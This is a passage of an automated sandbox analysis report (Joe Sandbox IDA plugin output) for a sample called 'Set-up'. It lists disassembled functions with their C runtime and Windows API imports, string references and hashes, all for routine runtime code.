malloc.MSVCR100(?,00000014,6BB85DD5,?,00000001,00000001), ref: 6BB856C3

Part of subcall function 6BB40233: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6BB40CEA,00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7), ref: 6BB40263

std::exception::exception.LIBCMT(?,00000001,00000014,6BB85DD5,?,00000001,00000001), ref: 6BB856EC
_CxxThrowException.MSVCR100(?,6BB4BDD8,?,00000001,00000014,6BB85DD5,?,00000001,00000001), ref: 6BB85701
?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR100(00000000,00000002,00000001,000000FF,00000014,6BB85DD5,?,00000001,00000001), ref: 6BB85736
_freea_s.MSVCR100(00000000,00000000,00000002,00000001,000000FF,00000014,6BB85DD5,?,00000001,00000001), ref: 6BB8573C
?wait@event@Concurrency@@QAEII@Z.MSVCR100(000000FF,00000014,6BB85DD5,?,00000001,00000001), ref: 6BB8574B

Strings

bad allocation, xrefs: 6BB856E5

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Concurrency@@$?wait@event@?wait_for_multiple@event@AllocExceptionH_prolog3_HeapThrowV12@_freea_smallocstd::exception::exception
String ID: bad allocation
API String ID: 559173246-2104205924
Opcode ID: 2d9be9ae75df92d8e8c039fa158e6ed65a2fba43d697caf2c825f6579d10ab52
Instruction ID: af61690f562019dd5474aba3009439e03a0eaa6e406edbb28db8f3f7ec5bdd4f
Opcode Fuzzy Hash: 2d9be9ae75df92d8e8c039fa158e6ed65a2fba43d697caf2c825f6579d10ab52
Instruction Fuzzy Hash: AC21F5B59002969FDB10CF68CC81F9D73A5FF44350F914294EA66AB284EB3CDD41C765

Function 6BB569D5 Relevance: 13.7, APIs: 9, Instructions: 226COMMON

Download Yara Rule

APIs

_memset.LIBCMT(?,000000FF,00000024,?,?,6BB569D0,?), ref: 6BB569F5
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB56A30
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB56AED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB56B46
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB56B63
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB56B86
_errno.MSVCR100(?,?,6BB569D0,?), ref: 6BB69D32
_invalid_parameter_noinfo.MSVCR100(?,?,6BB569D0,?), ref: 6BB69D3C
_errno.MSVCR100(?,?,?,?,6BB569D0,?), ref: 6BB69D56

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_errno$_invalid_parameter_noinfo_memset
String ID:
API String ID: 1299486453-0
Opcode ID: 82e5ba753f3cf070e716e9e95f0d410c269157ef4256011120348a4e26fdf242
Instruction ID: 440b26a8e443edff14e096f2d034d5ecd23fc714150e3a7f23d093035498f8f9
Opcode Fuzzy Hash: 82e5ba753f3cf070e716e9e95f0d410c269157ef4256011120348a4e26fdf242
Instruction Fuzzy Hash: 846145B2A00645AFDB049F68CC41BAE77BAEB88768F10816DF551DB2D1E77CED108B40

Function 6BB4AD86 Relevance: 13.7, APIs: 9, Instructions: 200COMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32(?), ref: 6BB4AD93
_calloc_crt.MSVCR100(00000020,00000040), ref: 6BB4AD9F
GetStdHandle.KERNEL32(-000000F6), ref: 6BB4AE36
GetFileType.KERNEL32(00000000), ref: 6BB4AE50
InitializeCriticalSectionAndSpinCount.KERNEL32(-6BBE3734,00000FA0), ref: 6BB4AE80
SetHandleCount.KERNEL32 ref: 6BB4AEA1

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CountHandle$CriticalFileInfoInitializeSectionSpinStartupType_calloc_crt
String ID:
API String ID: 1159209115-0
Opcode ID: 251b11443c227c1932cf26f2feb60de41fc99e0c2612a955387ad5603e1057e0
Instruction ID: 2460fd6dd2edca4b76aacebca425ddbda431a2afc9739ef71782e2de8440a707
Opcode Fuzzy Hash: 251b11443c227c1932cf26f2feb60de41fc99e0c2612a955387ad5603e1057e0
Instruction Fuzzy Hash: D57103B29447818FD7208F28C8C8B6D77A4FF06764F2447A8D5B6DB2E1E739D8419B41

Function 6BB442DE Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(?), ref: 6BB690CA
_fileno.MSVCR100(?), ref: 6BB690DB
_fileno.MSVCR100(?), ref: 6BB690E7
_fileno.MSVCR100(?,?), ref: 6BB690F7
_fileno.MSVCR100(?), ref: 6BB6911A
_fileno.MSVCR100(?), ref: 6BB69126
_fileno.MSVCR100(?), ref: 6BB69132
_fileno.MSVCR100(?,?), ref: 6BB69142

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _fileno
String ID:
API String ID: 467780811-0
Opcode ID: aefb678a70d1f9c64df69ae6cc1f4c3d765461007de8943255dc7407ed1230ce
Instruction ID: 2a9fbe14648d8479e57104baf2fb149b41b21c031c55ca5309be14e681510fc8
Opcode Fuzzy Hash: aefb678a70d1f9c64df69ae6cc1f4c3d765461007de8943255dc7407ed1230ce
Instruction Fuzzy Hash: 51510331504782DFC7218F28C845B9A73F0FF5AB68B244969D4B59B291EB3CE945DB40

Function 6BB52E42 Relevance: 13.7, APIs: 9, Instructions: 165COMMON

Download Yara Rule

APIs

memcpy_s.MSVCR100(?,?,?,?), ref: 6BB52EEB
_errno.MSVCR100 ref: 6BB68C29
_invalid_parameter_noinfo.MSVCR100 ref: 6BB68C34
_memset.LIBCMT(?,00000000,?), ref: 6BB68C47
_fileno.MSVCR100(?,?,?), ref: 6BB68CA3
_read.MSVCR100(00000000,?,?), ref: 6BB68CAA
_memset.LIBCMT(?,00000000,000000FF), ref: 6BB68CD4
_errno.MSVCR100 ref: 6BB68CDC

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_memset$_fileno_invalid_parameter_noinfo_readmemcpy_s
String ID:
API String ID: 4008029522-0
Opcode ID: a068426ed4a9256c8f7709657f9dc5e33b02665cc90f0d207b602e5e90d0fa0d
Instruction ID: 2fa177683da3b64a936824b20a71a84cd2e7ff0e71a160351003417621b92a25
Opcode Fuzzy Hash: a068426ed4a9256c8f7709657f9dc5e33b02665cc90f0d207b602e5e90d0fa0d
Instruction Fuzzy Hash: AF51E872E02785EBCB218FB8CD4068D7771EF41764F10866AE825562D0F7B89A61CF52

Function 6BB503E4 Relevance: 13.6, APIs: 9, Instructions: 132COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(6BB51022,?,?,?,6BB51022,00000040,?), ref: 6BB503EF
_write.MSVCR100(6BB51022,FFFF94F1,00000000,00000000,6BBE35D0,?,?,?,6BB51022,00000040,?), ref: 6BB5045D
__p__iob.MSVCR100(6BBE35D0,?,?,?,6BB51022,00000040,?), ref: 6BB52ACF
__p__iob.MSVCR100(6BBE35D0,?,?,?,6BB51022,00000040,?), ref: 6BB52ADF
_errno.MSVCR100(?,?,?,6BB51022,00000040,?), ref: 6BB688CD
_errno.MSVCR100(?,?,?,6BB51022,00000040,?), ref: 6BB688E4
_isatty.MSVCR100(6BB51022,6BBE35D0,?,?,?,6BB51022,00000040,?), ref: 6BB6890B
__lseeki64.LIBCMT(6BB51022,00000000,00000000,00000002,00000000,6BBE35D0,?,?,?,6BB51022,00000040,?), ref: 6BB68928
_write.MSVCR100(6BB51022,00000040,00000001,00000000,6BBE35D0,?,?,?,6BB51022,00000040,?), ref: 6BB68948

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __p__iob_errno_write$__lseeki64_fileno_isatty
String ID:
API String ID: 2198290031-0
Opcode ID: 5723f7dfd66e9a3a11eb3b8d2f19e8e0d030fa13ae189b4a8b29f39d8de2eaf9
Instruction ID: c6aaecd2066e54f8f77e8bf9197a8a6b123c6d0f74abc6bd4130bf985efe11aa
Opcode Fuzzy Hash: 5723f7dfd66e9a3a11eb3b8d2f19e8e0d030fa13ae189b4a8b29f39d8de2eaf9
Instruction Fuzzy Hash: 5E41E4728047859FD7248F38CC41A5A7BB4EF46368B50C65EE4B99B2D0E73CE950CB12

Function 6BB539A1 Relevance: 13.6, APIs: 9, Instructions: 132COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(?,?,?,?,6BB53AA1,?,?), ref: 6BB539AC
__p__iob.MSVCR100(6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB539EE
__p__iob.MSVCR100(6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB539FE
_errno.MSVCR100(?,?,?,6BB53AA1,?,?), ref: 6BB68964
_errno.MSVCR100(?,?,?,6BB53AA1,?,?), ref: 6BB6897D
_isatty.MSVCR100(?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB689A5
_write.MSVCR100(?,?,?,?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB689B4
__lseeki64.LIBCMT(?,00000000,00000000,00000002,?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB689D2

Part of subcall function 6BB4CF2C: _malloc_crt.MSVCR100(00001000,?,6BB53A14,?,6BBE35D0,?,?,?,6BB53AA1,?,?), ref: 6BB4CF36

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __p__iob_errno$__lseeki64_fileno_isatty_malloc_crt_write
String ID:
API String ID: 2248077258-0
Opcode ID: 928dc6e7eef605b81cbdf1ae05168ce9af8f04386b4aeb9f3c7f1f70dd183c42
Instruction ID: a24d11fec6e5523deafacfa41467c229a0599e83e0c00cd4de75dda01eb69e54
Opcode Fuzzy Hash: 928dc6e7eef605b81cbdf1ae05168ce9af8f04386b4aeb9f3c7f1f70dd183c42
Instruction Fuzzy Hash: 0541B4729007819FD7208F69CC41B5D77A0EF46368F10966EE4A69B7D0E73CE940CB56

Function 6BB7D988 Relevance: 13.6, APIs: 9, Instructions: 75COMMON

Download Yara Rule

APIs

??_V@YAXPAX@Z.MSVCR100(?,6BB7DB65,?,?,?,?,?,6BB7D133,?,00000000), ref: 6BB7D99D
??_V@YAXPAX@Z.MSVCR100(?,?,6BB7DB65,?,?,?,?,?,6BB7D133,?,00000000), ref: 6BB7D9A5
??_V@YAXPAX@Z.MSVCR100(?,?,?,6BB7DB65,?,?,?,?,?,6BB7D133,?,00000000), ref: 6BB7D9AD
??_U@YAPAXI@Z.MSVCR100(00000000,?,?,?,6BB7DB65,?,?,?,?,?,6BB7D133,?,00000000), ref: 6BB7D9C4
??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BB7D9E7
??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6BB7DA01
_memset.LIBCMT(?,00000000,?,6BB7DB65,?,?,?,?,?,6BB7D133,?,00000000), ref: 6BB7DA17
_memset.LIBCMT(?,00000000,?,00000000), ref: 6BB7DA30
_memset.LIBCMT(?,00000000,?,?,00000000,?,00000000), ref: 6BB7DA41

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 399dc4ed66b7cbe5b5e6b7a1d4377a48d4a9f37d9226bb78bfb4cd55a10beb20
Instruction ID: fb5427079a37924242668c83a34a5318b050cc0b52bb3a3b8b16e66bfc436a0f
Opcode Fuzzy Hash: 399dc4ed66b7cbe5b5e6b7a1d4377a48d4a9f37d9226bb78bfb4cd55a10beb20
Instruction Fuzzy Hash: D121F9B1641B815FE7349B39D843B2BB7E4FF04354F50892DE2978A9A4EB79F8509B00

Function 6BB4C038 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

APIs

__doserrno.MSVCR100(6BB4C0D8,00000010,6BB4CE99,00000000,?,?,?,?,6BB53379,?), ref: 6BB4C0FC
__doserrno.MSVCR100(6BB4C0D8,00000010,6BB4CE99,00000000,?,?,?,?,6BB53379,?), ref: 6BB6FD25
_errno.MSVCR100(6BB4C0D8,00000010,6BB4CE99,00000000,?,?,?,?,6BB53379,?), ref: 6BB6FD2D
_errno.MSVCR100(6BB4C0D8,00000010,6BB4CE99,00000000,?,?,?,?,6BB53379,?), ref: 6BB6FD43
_invalid_parameter_noinfo.MSVCR100(6BB4C0D8,00000010,6BB4CE99,00000000,?,?,?,?,6BB53379,?), ref: 6BB6FD4E
__doserrno.MSVCR100(6BB4C0D8,00000010,6BB4CE99,00000000,?,?,?,?,6BB53379,?), ref: 6BB6FD55
_errno.MSVCR100(6BB4C0D8,00000010,6BB4CE99,00000000,?,?,?,?,6BB53379,?), ref: 6BB6FD5D
_errno.MSVCR100(6BB4C0D8,00000010,6BB4CE99,00000000,?,?,?,?,6BB53379,?), ref: 6BB6FD6A
__doserrno.MSVCR100(6BB4C0D8,00000010,6BB4CE99,00000000,?,?,?,?,6BB53379,?), ref: 6BB6FD75

Part of subcall function 6BB4A5A9: EnterCriticalSection.KERNEL32(00000108,6BB4A610,0000000C,6BB5038E,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?), ref: 6BB4A5FA

Part of subcall function 6BB4BF22: ReadFile.KERNEL32(?,00000040,?,?,00000000,?,?,?), ref: 6BB4BFE8

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __doserrno_errno$CriticalEnterFileReadSection_invalid_parameter_noinfo
String ID:
API String ID: 590220429-0
Opcode ID: a4cba056c42773f53feb9fe190aee6f6a5691ae5d4900bcb0460974da8753d0b
Instruction ID: e268deab6d8d0398c53c938bd2fb681c17e008b91f59107996e3dc62b2774b4f
Opcode Fuzzy Hash: a4cba056c42773f53feb9fe190aee6f6a5691ae5d4900bcb0460974da8753d0b
Instruction Fuzzy Hash: 3A219D728443C5DFD7219FB8C842B5D3760BF12729F100691E5309B2E9DBBD9944AF62

Function 6BB4A9DB Relevance: 13.6, APIs: 9, Instructions: 61COMMON

Download Yara Rule

APIs

_malloc_crt.MSVCR100(00000018,6BB4AA18,0000000C,6BB674F7,00000001,00000001,?,6BB421A9,0000000D), ref: 6BB4AB8B
_lock.MSVCR100(0000000A,6BB4AA18,0000000C,6BB674F7,00000001,00000001,?,6BB421A9,0000000D), ref: 6BB4AB9D
InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,6BB4AA18,0000000C,6BB674F7,00000001,00000001,?,6BB421A9,0000000D), ref: 6BB4ABB4
__FF_MSGBANNER.LIBCMT ref: 6BB6749F
__NMSG_WRITE.LIBCMT ref: 6BB674A6
_errno.MSVCR100(6BB4AA18,0000000C,6BB674F7,00000001,00000001,?,6BB421A9,0000000D), ref: 6BB674B9

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin_errno_lock_malloc_crt
String ID:
API String ID: 957642387-0
Opcode ID: c2ef2b8acc0d898ab97728d7bc4fe7a7c620437c1289d20010dd7a2a13391e95
Instruction ID: 62c11b22ec9dc22f6e0b5af41d656421fc4c7f967a9611d241190ae124119947
Opcode Fuzzy Hash: c2ef2b8acc0d898ab97728d7bc4fe7a7c620437c1289d20010dd7a2a13391e95
Instruction Fuzzy Hash: 0111E0315483C2EEEB106FB58886A2D77A0BF52B18F50406ED5106B1D8DBBC8981EF62

Function 6BB427B6 Relevance: 13.5, APIs: 9, Instructions: 44COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 6BB427D7
GetLastError.KERNEL32 ref: 6BB4FA08
__dosmaperr.LIBCMT(00000000), ref: 6BB4FA0F
_errno.MSVCR100 ref: 6BB4FA15
__doserrno.MSVCR100 ref: 6BB67B05
_errno.MSVCR100 ref: 6BB67B0C
_invalid_parameter_noinfo.MSVCR100 ref: 6BB67B16
__doserrno.MSVCR100 ref: 6BB67B22
_errno.MSVCR100 ref: 6BB67B2D

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$__doserrno$AttributesErrorFileLast__dosmaperr_invalid_parameter_noinfo
String ID:
API String ID: 2636503730-0
Opcode ID: e204075c1cba154c601eab38f1f0100590f5f4d8b893c7c549ae6a44956db97b
Instruction ID: 4455bfd865a85377ba8e6a8b0c5a5c06cd1545fbdde51de7325a2bfd9fcfce0a
Opcode Fuzzy Hash: e204075c1cba154c601eab38f1f0100590f5f4d8b893c7c549ae6a44956db97b
Instruction Fuzzy Hash: 48016D305486D49EC7226F798946B9D3764FF02768F024155E8248B198EB7C8882FFA1

Function 6BB861D3 Relevance: 13.5, APIs: 9, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB861DA
__ExceptionPtrCopy.LIBCMT(?,00000008,00000014,6BB858ED,?,?,00000000), ref: 6BB861F1

Part of subcall function 6BB8BBFB: __EH_prolog3.LIBCMT ref: 6BB8BC02
Part of subcall function 6BB8BBFB: _Reset.LIBCMT ref: 6BB8BC21

?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(00000008,?,00000008,00000014,6BB858ED,?,?,00000000), ref: 6BB861FB

Part of subcall function 6BB8BB8A: shared_ptr.LIBCMT ref: 6BB8BB94

??3@YAXPAX@Z.MSVCR100(00000008,00000008,?,00000008,00000014,6BB858ED,?,?,00000000), ref: 6BB86201
__uncaught_exception.MSVCR100 ref: 6BB8620D
__ExceptionPtrCopy.LIBCMT(?,?), ref: 6BB8621E
?__ExceptionPtrRethrow@@YAXPBX@Z.MSVCR100(?,?,?), ref: 6BB8622B
?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?,?,?,?), ref: 6BB86238
?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?), ref: 6BB86248

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Exception$Destroy@@$CopyH_prolog3$??3@ResetRethrow@@__uncaught_exceptionshared_ptr
String ID:
API String ID: 1394407404-0
Opcode ID: e677b4f6a6fb880f6466851db9746d842a0af747f6e31e0f2e41078887e7efda
Instruction ID: a0260f14910c2de48fc8a32b170e80afbbba5bf703e903221bad6b5b0947eb2e
Opcode Fuzzy Hash: e677b4f6a6fb880f6466851db9746d842a0af747f6e31e0f2e41078887e7efda
Instruction Fuzzy Hash: 4F01A272C015D8AADF20EBF49946FDDB77CBF09229F400294DA54A7090DB3DA7458BB1

Function 6BB4D963 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

generic-type-, xrefs: 6BB4D9D6
template-parameter-, xrefs: 6BB4D9AA, 6BB6DC63

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID:
String ID: generic-type-$template-parameter-
API String ID: 0-13229604
Opcode ID: 7a5423c0f3fe075e3e4bc5991772cd16a098f68a3f1a8db2685de18737940dd0
Instruction ID: 004f41cc665b4aac021a58796419403a703d06e508200794459282e27e11d787
Opcode Fuzzy Hash: 7a5423c0f3fe075e3e4bc5991772cd16a098f68a3f1a8db2685de18737940dd0
Instruction Fuzzy Hash: A061CF71D442889FCB04CFB8E491AFEBBB8FB0A344F1000AAD651AB264D7799D09DB50

Function 6BB42719 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB69333
_invalid_parameter_noinfo.MSVCR100 ref: 6BB6933E
_errno.MSVCR100(?), ref: 6BB6934B
_invalid_parameter_noinfo.MSVCR100(?), ref: 6BB69356

Strings

B, xrefs: 6BB4274E

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: dfb0138fbacceb2ed61b1254190d5228ed7b83fcb00fb3b19c5fa06f21955bf8
Instruction ID: d1e5d0ee5ec77cd0df1c3cd08ba8eb53dd7a3d2f2f058a521647633aec836b21
Opcode Fuzzy Hash: dfb0138fbacceb2ed61b1254190d5228ed7b83fcb00fb3b19c5fa06f21955bf8
Instruction Fuzzy Hash: D5316F328142999FDF009FA8C8814EE7BB4FF49368F50062AE920A71D5E73C9911DFA5

Function 6BB41860 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB692C0
_invalid_parameter_noinfo.MSVCR100 ref: 6BB692CB
_errno.MSVCR100 ref: 6BB692D8
_invalid_parameter_noinfo.MSVCR100 ref: 6BB692E3

Strings

B, xrefs: 6BB41895

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

